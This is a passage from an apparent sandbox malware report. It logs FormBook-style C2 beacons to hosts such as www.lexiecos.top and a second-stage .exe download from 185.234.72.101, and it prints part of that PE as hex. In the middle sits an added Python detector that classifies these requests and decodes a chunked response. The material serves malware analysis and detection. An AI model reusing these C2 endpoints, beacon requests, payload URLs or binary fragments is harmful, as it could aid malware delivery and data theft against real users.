                  Data Ascii: n02X2xPX=ljhj3Grls4QknnRqbWwZGpIi9yDQlWbVE+3OzDgtDcWrwJ6GPycZbbAMHzgmGegwlSDG/mzURpthodAYfVmEJYP083WWppxqg22kEWI8/sLRzqM+jByKzZ5vhbI2fz9E9JWA3IO8JD7Orw7+NEl8Rzat/xwvhusIlizD1/owR5VmupyRriq2JlnAok8QecyMnw==
                  Jul 4, 2024 03:12:17.219511986 CEST | 533 | IN | HTTP/1.1 404 Not Found
                  Date: Thu, 04 Jul 2024 01:12:17 GMT
                  Server: Apache
                  Content-Length: 389
                  Connection: close
                  Content-Type: text/html
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  14 | 192.168.2.4 | 49751 | 203.161.55.102 | 80 | 2844 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:12:19.121758938 CEST | 776 | OUT | POST /ff8d/ HTTP/1.1
                  Host: www.lexiecos.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.lexiecos.top
                  Referer: http://www.lexiecos.top/ff8d/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 225
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 6c 6a 68 6a 33 47 72 6c 73 34 51 6b 6d 48 42 71 63 77 34 5a 52 35 49 6a 6a 69 44 51 76 32 61 65 45 2b 7a 4f 7a 47 52 77 57 2b 69 72 7a 73 57 47 4f 77 30 5a 57 37 41 4d 66 6a 67 6a 4d 2b 68 79 6c 53 4f 6d 2f 6b 6e 55 52 70 52 68 6f 66 59 59 65 69 36 46 49 49 50 68 31 58 57 55 30 35 78 71 67 32 32 6b 45 56 31 72 2f 73 44 52 79 61 38 2b 69 6b 4f 4a 36 35 35 73 70 37 49 32 62 7a 39 36 39 4a 58 56 33 4e 76 62 4a 41 44 4f 72 30 2f 2b 4f 56 6c 39 61 7a 61 52 69 42 78 39 73 4c 4e 6c 71 48 47 5a 39 64 49 70 62 61 35 78 72 76 6a 4c 36 54 4c 68 62 6c 44 7a 31 6a 31 6b 54 66 50 46 38 77 4f 75 65 74 33 41 44 77 4d 71 43 54 77 2f 57 31 7a 4d 41 68 55 3d
                  Data Ascii: n02X2xPX=ljhj3Grls4QkmHBqcw4ZR5IjjiDQv2aeE+zOzGRwW+irzsWGOw0ZW7AMfjgjM+hylSOm/knURpRhofYYei6FIIPh1XWU05xqg22kEV1r/sDRya8+ikOJ655sp7I2bz969JXV3NvbJADOr0/+OVl9azaRiBx9sLNlqHGZ9dIpba5xrvjL6TLhblDz1j1kTfPF8wOuet3ADwMqCTw/W1zMAhU=
                  Jul 4, 2024 03:12:19.733378887 CEST | 533 | IN | HTTP/1.1 404 Not Found
                  Date: Thu, 04 Jul 2024 01:12:19 GMT
                  Server: Apache
                  Content-Length: 389
                  Connection: close
                  Content-Type: text/html
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  15 | 192.168.2.4 | 49752 | 203.161.55.102 | 80 | 2844 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:12:21.680033922 CEST | 10858 | OUT | POST /ff8d/ HTTP/1.1
                  Host: www.lexiecos.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.lexiecos.top
                  Referer: http://www.lexiecos.top/ff8d/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 10305
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 6c 6a 68 6a 33 47 72 6c 73 34 51 6b 6d 48 42 71 63 77 34 5a 52 35 49 6a 6a 69 44 51 76 32 61 65 45 2b 7a 4f 7a 47 52 77 57 2b 61 72 7a 61 43 47 4d 58 6f 5a 58 37 41 4d 42 7a 67 69 4d 2b 68 7a 6c 54 6d 35 2f 6b 36 68 52 73 64 68 70 38 51 59 5a 54 36 46 48 49 50 68 33 58 57 52 70 70 77 67 67 79 71 67 45 56 6c 72 2f 73 44 52 79 59 6b 2b 6c 78 79 4a 38 35 35 76 68 62 49 79 66 7a 39 42 39 4b 6e 46 33 4e 6a 68 4a 52 6a 4f 72 51 62 2b 65 33 39 39 46 44 61 70 68 42 77 34 73 4c 4a 6d 71 42 69 64 39 5a 41 54 62 5a 6c 78 71 6f 69 41 39 6a 54 78 45 6d 6d 68 71 44 78 2f 55 2b 6e 48 79 48 62 52 62 39 6e 76 64 41 38 38 47 54 31 4c 52 41 79 4b 53 42 53 54 6b 46 46 4a 65 44 42 68 31 47 52 33 57 66 70 78 48 4d 4a 46 63 6e 6c 47 4e 69 57 2f 77 57 6a 67 6c 69 79 75 49 6f 56 57 59 58 6a 37 69 67 67 67 50 47 57 34 64 67 7a 6a 62 50 69 54 74 75 77 70 75 45 74 4c 6b 61 4b 54 66 4d 32 56 59 6a 56 49 6a 54 32 50 6f 37 6c 43 7a 68 54 75 65 6b 65 54 6f 30 68 38 65 44 65 6e 2b 6c 33 52 66 39 59 69 4c [TRUNCATED]
                  Data Ascii: n02X2xPX= [TRUNCATED]
                  Jul 4, 2024 03:12:22.283852100 CEST | 533 | IN | HTTP/1.1 404 Not Found
                  Date: Thu, 04 Jul 2024 01:12:22 GMT
                  Server: Apache
                  Content-Length: 389
                  Connection: close
                  Content-Type: text/html
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  16 | 192.168.2.4 | 49753 | 203.161.55.102 | 80 | 2844 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:12:24.376986027 CEST | 497 | OUT | GET /ff8d/?XHUPe=Ud3TZHA0-F74ZZ&n02X2xPX=ohJD03igrpR8lwlwc1M4EqZrzingiHicFb+y4T5GGfrPyp+0FgUaOIwicDYxE9IqyQjr9lfiRuNbkNF7eyT6Zergy2OfkJkLywWhdn0W3d/t29Aith2p64g= HTTP/1.1
                  Host: www.lexiecos.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Jul 4, 2024 03:12:24.993602991 CEST | 250 | IN | HTTP/1.1 200 OK
                  Date: Thu, 04 Jul 2024 01:12:24 GMT
                  Server: Apache
                  Vary: Accept-Encoding
                  Content-Length: 76
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 71 68 56 5a 70 6e 61 47 6c 62 52 55 39 56 52 4c 61 6c 4e 68 58 4d 63 69 67 6b 71 64 33 68 69 59 58 75 2f 4d 74 6a 67 75 51 72 37 4b 33 4d 43 53 53 78 4d 55 5a 5a 45 5a 45 43 30 54 41 64 41 72 6d 52 48 72 6c 32 48 66 54 77 3d 3d
                  Data Ascii: qhVZpnaGlbRU9VRLalNhXMcigkqd3hiYXu/MtjguQr7K3MCSSxMUZZEZEC0TAdArmRHrl2HfTw==


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  17 | 192.168.2.4 | 49754 | 185.234.72.101 | 80 | 1908 | C:\Windows\SysWOW64\RMActivate_ssp.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:12:29.437565088 CEST | 230 | OUT | GET /VT3g2PdlLRVpwBp.exe HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Host: 185.234.72.101
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jul 4, 2024 03:12:30.084703922 CEST | 1236 | IN | HTTP/1.1 200 OK
                  Date: Thu, 04 Jul 2024 01:12:30 GMT
                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                  Last-Modified: Wed, 03 Jul 2024 05:35:30 GMT
                  ETag: "f0400-61c5132d1e957"
                  Accept-Ranges: bytes
                  Content-Length: 984064
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: application/x-msdownload
                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ea 3a a0 f5 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 9c 0e 00 00 66 00 00 00 00 00 00 32 bb 0e 00 00 20 00 00 00 c0 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0f 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 df ba 0e 00 4f 00 00 00 00 c0 0e 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0f 00 0c 00 00 00 c0 9d 0e 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL:0f2 @ `@Od@p H.text8 `.rsrcdd@@.reloc@@BHXkE50}s}}(({o(C,b{rporpo{(J(o{o{rpo}8U}{r)por)po(C{oX(o{oZo{o^(o{o\(o
                  Jul 4, 2024 03:12:30.084984064 CEST | 1236 | IN | Data Raw: 7b 06 00 00 04 08 6f 60 00 00 06 0b 12 01 28 19 00 00 0a 6f 18 00 00 0a 00 02 7b 07 00 00 04 08 6f 62 00 00 06 0b 12 01 28 19 00 00 0a 6f 18 00 00 0a 00 08 75 08 00 00 02 14 fe 03 13 04 11 04 2c 48 00 02 7b 12 00 00 04 17 6f 1a 00 00 0a 00 02 7b
                  Data Ascii: {o`(o{ob(ou,H{o{rpo{to>(o}+>{o{rApo{toUo}{o(&{o*{
                  Jul 4, 2024 03:12:30.084990025 CEST | 1236 | IN | Data Raw: 00 09 11 04 30 0e 09 16 32 07 11 04 16 fe 04 2b 01 17 2b 01 17 13 0b 11 0b 39 98 00 00 00 00 02 7b 06 00 00 04 28 22 00 00 0a 6f 23 00 00 0a 00 02 7b 07 00 00 04 28 22 00 00 0a 6f 23 00 00 0a 00 09 11 04 fe 02 13 0c 11 0c 2c 32 00 02 7b 03 00 00
                  Data Ascii: 02++9{("o#{("o#,2{{rpo${{rKpo$+0{{rpo${{rpo$80+,~{("o#{("o#{("
                  Jul 4, 2024 03:12:30.086328030 CEST | 1236 | IN | Data Raw: 7b 06 00 00 04 02 fe 06 09 00 00 06 73 3a 00 00 0a 6f 3b 00 00 0a 00 02 7b 07 00 00 04 1f 74 20 1d 01 00 00 73 34 00 00 0a 6f 35 00 00 0a 00 02 7b 07 00 00 04 72 31 04 00 70 6f 36 00 00 0a 00 02 7b 07 00 00 04 1f 4a 1f 14 73 37 00 00 0a 6f 38 00
                  Data Ascii: {s:o;{t s4o5{r1po6{Js7o8{o9{s:o;{v s4o5{r=po6{ s7o8{o9{s:o;{v s4
                  Jul 4, 2024 03:12:30.086333036 CEST | 1236 | IN | Data Raw: 00 00 04 1f 45 1f 53 73 34 00 00 0a 6f 35 00 00 0a 00 02 7b 11 00 00 04 72 1d 05 00 70 6f 36 00 00 0a 00 02 7b 11 00 00 04 1f 1b 1f 18 73 37 00 00 0a 6f 38 00 00 0a 00 02 7b 11 00 00 04 1f 0c 6f 39 00 00 0a 00 02 7b 11 00 00 04 72 29 05 00 70 6f
                  Data Ascii: ESs4o5{rpo6{s7o8{o9{r)po{o1{rp"@As2o3{ s4o5{r/po6{es7o8{o9{o<{rCpo{
                  Jul 4, 2024 03:12:30.087090015 CEST | 1236 | IN | Data Raw: 04 6f 44 00 00 0a 00 02 28 43 00 00 0a 02 7b 09 00 00 04 6f 44 00 00 0a 00 02 28 43 00 00 0a 02 7b 0a 00 00 04 6f 44 00 00 0a 00 02 28 43 00 00 0a 02 7b 0b 00 00 04 6f 44 00 00 0a 00 02 28 43 00 00 0a 02 7b 0c 00 00 04 6f 44 00 00 0a 00 02 28 43
                  Data Ascii: oD(C{oD(C{oD(C{oD(C{oD(C{oD(C{oD(C{oD(C{oD(C{oD(C{oD(E(Frp(6rpo(G(H*
                  Jul 4, 2024 03:12:30.087101936 CEST | 1236 | IN | Data Raw: 0a 00 2a 00 00 13 30 03 00 86 00 00 00 07 00 00 11 00 02 7b 2b 00 00 04 6f 53 00 00 0a 2c 15 02 7b 2b 00 00 04 6f 53 00 00 0a 6f 54 00 00 0a 16 fe 01 2b 01 17 0b 07 2c 0e 00 72 85 06 00 70 28 55 00 00 0a 26 2b 4f 72 c5 06 00 70 72 1b 07 00 70 1a
                  Data Ascii: *0{+oS,{+oSoT+,rp(U&+Orprp(X,+3{{+oSoVuoY&{2(o*0p{.o(&,{*~KoJ+F~K sZ(+(+o]
                  Jul 4, 2024 03:12:30.088169098 CEST | 1236 | IN | Data Raw: 02 7b 25 00 00 04 72 b9 02 00 70 6f 24 00 00 0a 00 16 13 04 00 2b 69 00 02 7b 24 00 00 04 28 25 00 00 0a 6f 23 00 00 0a 00 02 7b 25 00 00 04 28 25 00 00 0a 6f 23 00 00 0a 00 02 7b 1a 00 00 04 02 7b 27 00 00 04 72 93 00 00 70 6f 24 00 00 0a 00 02
                  Data Ascii: {%rpo$+i{$(%o#{%(%o#{{'rpo${{$rpo${{%rpo$+*0+,{+,{o*(+*0<s,}s_}s-}$
                  Jul 4, 2024 03:12:30.088176012 CEST | 1236 | IN | Data Raw: 00 02 7b 1d 00 00 04 6f 63 00 00 0a 6f 43 00 00 0a 02 7b 2b 00 00 04 6f 44 00 00 0a 00 02 7b 1d 00 00 04 6f 63 00 00 0a 6f 43 00 00 0a 02 7b 2a 00 00 04 6f 44 00 00 0a 00 02 7b 1d 00 00 04 20 18 03 00 00 20 84 01 00 00 73 37 00 00 0a 6f 38 00 00
                  Data Ascii: {ocoC{+oD{ocoC{*oD{ s7o8{ od{o9{$ s4o5{$r%po6{$Js7o8{$o9{$s:o;{%5 s4o5{
                  Jul 4, 2024 03:12:30.089225054 CEST | 1236 | IN | Data Raw: 0a 00 02 7b 1f 00 00 04 17 6f 31 00 00 0a 00 02 7b 1f 00 00 04 72 b7 03 00 70 22 00 00 64 41 16 19 16 73 32 00 00 0a 6f 33 00 00 0a 00 02 7b 1f 00 00 04 1f 23 1f 61 73 34 00 00 0a 6f 35 00 00 0a 00 02 7b 1f 00 00 04 72 03 05 00 70 6f 36 00 00 0a
                  Data Ascii: {o1{rp"dAs2o3{#as4o5{rpo6{=s7o8{o9{rpo{ o1{ rp"dAs2o3{ E-s4o5{ rpo6{ s7o8{
                  Jul 4, 2024 03:12:30.091783047 CEST | 1236 | IN | Data Raw: 00 04 1f 0c 6f 39 00 00 0a 00 02 7b 2a 00 00 04 02 fe 06 10 00 00 06 73 68 00 00 0a 6f 69 00 00 0a 00 02 7b 32 00 00 04 72 b7 03 00 70 22 00 00 1c 41 17 19 16 73 32 00 00 0a 6f 33 00 00 0a 00 02 7b 32 00 00 04 20 54 02 00 00 20 bb 01 00 00 73 34
                  Data Ascii: o9{*shoi{2rp"As2o3{2 T s4o5{2r1po6{2](s7o8{2o9{2rpo{2o={2s:o>{3rp"As2o3{3 s
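
What the sessions above add up to, as an added example and not Joe Sandbox output or code from the sample: every request sent by the injected bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe has the same shape (a four-character directory such as /il19/, one opaque form field n02X2xPX= or that same blob in the query string next to XHUPe=, Origin and Referer pointing back at the C2 host, Connection: close, and a fixed Chrome/43 User-Agent); the 530 bodies from the "cdn" server are chunked and the report prints them undecoded; and session 17 is a different thing entirely, RMActivate_ssp.exe pulling a PE from a bare IP. The Python below parses request text copied from those sessions (Accept headers and the long bodies trimmed), scores the beacon traits, separates the second-stage fetch, and reassembles the chunked 530 body. The BENIGN request, the regexes and the four-indicator threshold are assumptions of this example, and the traits it keys on are the ones this capture shows, not a full signature for the family.

```python
import ipaddress
import re

# Added example for the sessions above, not Joe Sandbox code. Request text is copied
# from the capture (Accept headers and long bodies trimmed); BENIGN, the regexes and
# the indicator threshold are assumptions.
FORMBOOK_UA = ("Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36")
C2_PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")                      # /1kbe/ /il19/ /ff8d/ /l8a4/
BLOB_RE = re.compile(r"^[A-Za-z0-9]{5,12}=[A-Za-z0-9+/=]{40,}$")  # n02X2xPX=<base64-ish>

BEACON_POST = (  # session 9
    "POST /il19/ HTTP/1.1\r\nHost: www.mhtnvro.lol\r\n"
    "Origin: http://www.mhtnvro.lol\r\nReferer: http://www.mhtnvro.lol/il19/\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nConnection: close\r\n"
    f"User-Agent: {FORMBOOK_UA}\r\n\r\n"
    "n02X2xPX=7Ucokq2EvY2qwh8Z7FTyCXMOnVzLmcgj+ZCir3nHflTlPGt4dhgWqZBd54yj6ROh"
    "/YX8DFE9bRdPN2Pwy5kUtKj4/qSGzpHodB6vquOYNINskdHDZR2kqKbIDDVDK6gscwUdabSj"
    "SzLJNY8JeUVevPJ0uuwraIzDm4Jh69MyiaUcwus4wSr8G+928T3mxDx0/Q=="
)
BEACON_GET = (  # session 8
    "GET /1kbe/?XHUPe=Ud3TZHA0-F74ZZ&n02X2xPX=tZQfW8UiiNJTf5Fq5WrX9vmmZrioxCoVqMwq"
    "5i80b8QJkwpSgFAdETlO4QFSoDRfTxjpMxprnPemrx/P1Sfw5KD2hu+ipHyltaJOhZhwSC5dlg"
    "XXfIxM6PM= HTTP/1.1\r\nHost: www.a9jcpf.top\r\nConnection: close\r\n"
    f"User-Agent: {FORMBOOK_UA}\r\n\r\n"
)
PAYLOAD_FETCH = (  # session 17, sent by the injected RMActivate_ssp.exe
    f"GET /VT3g2PdlLRVpwBp.exe HTTP/1.1\r\nUser-Agent: {FORMBOOK_UA}\r\n"
    "Host: 185.234.72.101\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
)
BENIGN = (  # constructed for contrast, not from the capture
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/127.0\r\n"
    "Connection: keep-alive\r\n\r\n"
)
# Raw bytes of the HTTP/1.1 530 body from the "cdn" server, copied from session 8.
CDN_530_BODY = bytes.fromhex(
    "32640d0a" "e29ea1efb88f" "e5bd93e5898de8aebfe997aee79a84e88a82e782b9efbc9a"
    "3230372e3134382e33372e32353220" "0d0a300d0a0d0a"
)

def parse_request(text: str) -> dict:
    """Minimal HTTP/1.1 request parser: lower-cased headers, split query string, body."""
    head, _, body = text.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.strip("\n").split("\n")
    method, target, _ = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    headers = {k.strip().lower(): v.strip() for k, _, v in (h.partition(":") for h in header_lines)}
    params = dict(p.split("=", 1) for p in query.split("&") if "=" in p)
    return {"method": method, "path": path, "query": params, "headers": headers, "body": body.strip()}

def formbook_indicators(req: dict) -> list:
    """Traits every beacon in the capture shares; each hit is one reason string."""
    h, hits = req["headers"], []
    host = h.get("host", "")
    if h.get("user-agent") == FORMBOOK_UA:
        hits.append("fixed Chrome/43 User-Agent")
    if C2_PATH_RE.match(req["path"]):
        hits.append("four-character C2 directory")
    if h.get("connection", "").lower() == "close":
        hits.append("Connection: close on a one-shot request")
    if req["method"] == "POST":
        if h.get("origin") == f"http://{host}" and h.get("referer") == f"http://{host}{req['path']}":
            hits.append("Origin/Referer point back at the C2 host")
        if BLOB_RE.match(req["body"]):
            hits.append("single base64-like form field")
    elif any(BLOB_RE.match(f"{k}={v}") for k, v in req["query"].items()):
        hits.append("base64-like blob in the query string")
    return hits

def is_formbook_beacon(req: dict) -> bool:
    # Threshold is an assumption; the UA alone is weak evidence (it is a real, if ancient, Chrome string).
    hits = formbook_indicators(req)
    return "fixed Chrome/43 User-Agent" in hits and len(hits) >= 4

def is_raw_ip_exe_fetch(req: dict) -> bool:
    """Second-stage pull: GET of a .exe from a Host header that is a bare IP address."""
    try:
        ipaddress.ip_address(req["headers"].get("host", ""))
    except ValueError:
        return False
    return req["method"] == "GET" and req["path"].lower().endswith(".exe")

def decode_chunked(raw: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body (the report prints it undecoded)."""
    out, pos = bytearray(), 0
    while True:
        end = raw.index(b"\r\n", pos)
        size = int(raw[pos:end].split(b";")[0], 16)   # chunk-size line, extensions ignored
        pos = end + 2
        if size == 0:
            return bytes(out)                         # last-chunk; trailers not needed here
        out += raw[pos:pos + size]
        pos += size + 2                               # skip chunk data and its trailing CRLF

def classify(text: str) -> str:
    req = parse_request(text)
    if is_formbook_beacon(req):
        return "formbook-c2"
    return "payload-fetch" if is_raw_ip_exe_fetch(req) else "unremarkable"
```

Run classify() over each request and keep formbook_indicators() for the triage note, since it names the reasons. decode_chunked(CDN_530_BODY) yields 45 bytes of UTF-8 that read "➡️ current node being accessed: 207.148.37.252", the edge node's own error text rather than anything the C2 sent back. The PE in session 17 is recognisable without decoding: Content-Type application/x-msdownload and the 4d 5a (MZ) prefix are already in the raw bytes above.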


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  18 | 192.168.2.4 | 49758 | 116.213.43.190 | 80 | 2844 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:12:35.806169987 CEST | 753 | OUT | POST /l8a4/ HTTP/1.1
                  Host: www.augaqfp.lol
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.augaqfp.lol
